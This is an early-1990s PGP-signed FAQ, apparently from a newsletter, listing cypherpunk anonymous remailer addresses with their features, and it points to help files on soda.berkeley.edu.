- ****************************************************************************
-
- -----BEGIN PGP SIGNED MESSAGE-----
-
- Q1: What cypherpunk remailers exist?
-
- A1:
-
- 1: hh@pmantis.berkeley.edu
- 2: hh@cicada.berkeley.edu
- 3: hh@soda.berkeley.edu
- 4: nowhere@bsu-cs.bsu.edu
- 5: remail@tamsun.tamu.edu
- 6: remail@tamaix.tamu.edu
- 7: ebrandt@jarthur.claremont.edu
- 8: hal@alumni.caltech.edu
- 9: remailer@rebma.mn.org
- 10: elee7h5@rosebud.ee.uh.edu
- 11: phantom@mead.u.washington.edu
- 12: hfinney@shell.portal.com
- 13: remailer@utter.dis.org
- 14: 00x@uclink.berkeley.edu
- 15: remail@extropia.wimsey.com
-
- NOTES:
- #1-#6 remail only, no encryption of headers
- #7-#12 support encrypted headers
- #15 special - header and message must be encrypted together
- #9,#13,#15 introduce larger than average delay (not direct connect)
- #14 public key not yet released
-
- #9,#13,#15 running on privately owned machines
-
- ======================================================================
-
- Q2: What help is available?
-
- A2:
-
- Check out the pub/cypherpunks directory at soda.berkeley.edu
- (128.32.149.19). Instructions on how to use the remailers are in the
- remailer directory, along with some unix scripts and dos batch files.
-
- Mail to me (elee9sf@menudo.uh.edu) for further help and/or questions.
-
- ======================================================================
-
-
- -----BEGIN PGP SIGNATURE-----
- Version: 2.2
-
- iQCVAgUBLAulOYOA7OpLWtYzAQHLfQP/XDSipOUPctZnqjjTq7+665MWgysE1ex9
- lh3Umzk2Q647KyqhoCo8f7nVrieAZxK0HjRFrRQnQCwjTSQrve2eAQ1A5PmJjyiI
- Y55E3YIXYmKrQekIHUKaMyATfnhNc6+2MT8mwaWz2kiOTRkun/SlNI3Cv3Qt8Emy
- Y6Zv0kk/7rs=
- =simY
- -----END PGP SIGNATURE-----
-
- [Editor: We suggest that everyone go ahead and get the info file from
- soda.berkeley.edu's ftp site. While you are there,
- take a look around. Lots of groovy free stuff.]
-
-